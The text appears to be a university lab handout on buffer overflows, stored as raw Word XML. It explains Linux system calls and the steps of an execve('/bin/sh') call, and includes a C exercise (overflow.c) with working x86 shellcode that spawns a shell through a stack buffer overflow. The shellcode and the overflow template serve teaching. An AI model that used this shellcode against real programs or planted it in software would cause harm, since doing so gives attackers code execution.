    <w:p w:rsidR="00426FE3" w:rsidRPr="002127CD" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34888981" wp14:editId="750FE0AB">
            <wp:extent cx="5486400" cy="3717290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 8" descr="C:\Users\User\Desktop\Exercise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Exercise4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17290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00374BBA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Syscall mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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So as we can see there is not much to the execve() system call.  All we need</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to do is:</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a) Have the null terminated string "/bin/sh" somewhere in memory.</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b) Have the address of the string "/bin/sh" somewhere in memory</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 xml:space="preserve">   followed by a null long word.</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c) Copy 0xb into the EAX register.</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d) Copy the address of the address of the string "/bin/sh" into the</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 xml:space="preserve">   EBX register.</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e) Copy the address of the string "/bin/sh" into the ECX register.</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f) Copy the address of the null long word into the EDX register.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002127CD" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002127CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t>g) Execute the int $0x80 instruction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00374BBA" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426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ab/>
      </w:r>
      <w:r w:rsidRPr="009E0434">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>A system call is just what its name implies -- a request for the operating system to do something on behalf of the user's program.  The</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system calls are functions used in the kernel itself.  To the programmer, the system call appears as a normal C function call.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426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426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426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r w:rsidRPr="009E0434">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>However since a system call executes code in the kernel, there must be a</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mechanism to change the mode of a process from user mode to kernel mode.</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The C compiler uses a predefined library of functions (the C library)</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that have the names of the system calls.  The library functions typically invoke an instruction that changes the process execution mode to kernel mode and causes the kernel to start executing code for system</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calls.  The instruction that causes the mode change is often referred to</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as an "operating system trap" which is a software generated interrupt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426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426FE3" w:rsidRDefault="00426FE3"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r w:rsidRPr="009E0434">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>The library routines execute in user mode, but the system call interface</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is a special case of an interrupt handler.  The library functions pass</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the kernel a unique number per system call in a machine dependent way --</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either as a parameter to the operating system trap, in a particular register, or on the stack -- and the kernel thus determines the specific system call the user is invoking.  In handling the operating system</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trap, the kernel looks up the system call number in a table to find the address of the appropriate kernel routine that is the entry point for the system call and to find the number of parameters the system call</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expects.  The kernel calculates the (user) address of the first</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parameter to the system call by adding (or subtracting, depending on the</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 xml:space="preserve">direction of stack growth) an offset to the user stack pointer, corresponding to the number of the parameters to the system call. Finally, it copies the user parameters to the "u area" and call the appropriate system call routine.  After executing the code for the system call, the kernel determines whether there was an error.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>If so,</w:t>
      </w:r>
      <w:r w:rsidRPr="009E0434">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> it adjusts register locations in the saved user register context, </w:t>
      </w:r>
      <w:r w:rsidRPr="009E0434">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>typically setting the "carry" bit for th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">e PS (processor status) register </w:t>
      </w:r>
      <w:r w:rsidRPr="009E0434">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>and copying the error number into register 0 location.  If there were no</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errors in the execution of the sy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">stem call, the kernel clears the </w:t>
      </w:r>
      <w:r w:rsidRPr="009E0434">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>"carry" bit in the PS register and copies the appropriate return values from the system call into the locations for registers 0 and 1 in the</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saved user register context.  When the kernel returns from the operating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009E0434">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>system trap to user mode, it returns to the library instruction after the trap instruction.  The library interprets the return values from the kernel and returns a value to the user program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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2205A7" w:rsidRPr="002205A7" w:rsidRDefault="002205A7" w:rsidP="00220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2"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exercise 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>What does the shellcode do?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="004768C4" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004768C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Text file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00CD31B5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E69374D" wp14:editId="557B7E0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426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="004768C4" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004768C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Compile and Run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28673A5E" wp14:editId="1B36F73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426FE3" w:rsidRPr="00CD31B5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00CD31B5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD31B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>It works! But there is an obstacle.  In most cases we'll be trying to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD31B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>overflow a character buffer.  As such any null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes in our shellcode will be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD31B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">considered the end of the string, and the copy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">will be terminated.  There must </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD31B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">be no null bytes in the shellcode for the exploit to work. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00CD31B5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exercise 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>What does this program do? Comment every instruction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Find what has to b</w:t>
      </w:r>
      <w:r w:rsidR="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> put in place of &lt;S&gt; and &lt;ADDR&gt; so that the shellcode is executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="004A4629" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">What would be the main obstacle in trying to overflow another </w:t>
      </w:r>
      <w:r w:rsidR="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>program?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">/* overflow.c */ </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 xml:space="preserve">#include &lt;string.h&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3"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char shellcode[] = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80" "\x53\x68\x2f\x74\x74\x79\x68\x2f\x64\x65\x76\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="001C1837" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">/* When you declare it as a char[ ], the memory is on the stack. */ </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char large_string[256];</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 xml:space="preserve">void sub() </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 xml:space="preserve">{ </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char buffer[96];</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 xml:space="preserve"> int i; </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 xml:space="preserve">for (i = 0; i &lt; strlen(shellcode); i++) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="001C1837" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C1837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>large_string[i + 128] = shellcode[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="001C1837" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C1837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> *(long *)(large_string + &lt;ADDR&gt;) = (long)&amp;large_string + &lt;S&gt;; strcpy(buffer,large_string); } void main() { memset(large_string,'A',255); large_string[255] = '\0';</w:t>
      </w:r>
      <w:r w:rsidRPr="001C1837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="001C1837" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C1837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sub();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="001C1837" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C1837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00054B29" w:rsidRDefault="00054B29"/>
    <w:sectPr w:rsidR="00054B29" w:rsidSect="00FC7281">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41E98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C99C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2D60A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B60D93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E535EE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78E6AD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795BF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57EA3B3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99B3D0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47C0EF38"/>
    <w:lvl w:ilvl="0" w:tplc="0EE4AEB0">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E3"/>
    <w:rsid w:val="00054B29"/>
    <w:rsid w:val="002205A7"/>
    <w:rsid w:val="003E46D2"/>
    <w:rsid w:val="00426FE3"/>
    <w:rsid w:val="00CF74B7"/>
    <w:rsid w:val="00D227A6"/>
    <w:rsid w:val="00FC7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4392F"/>
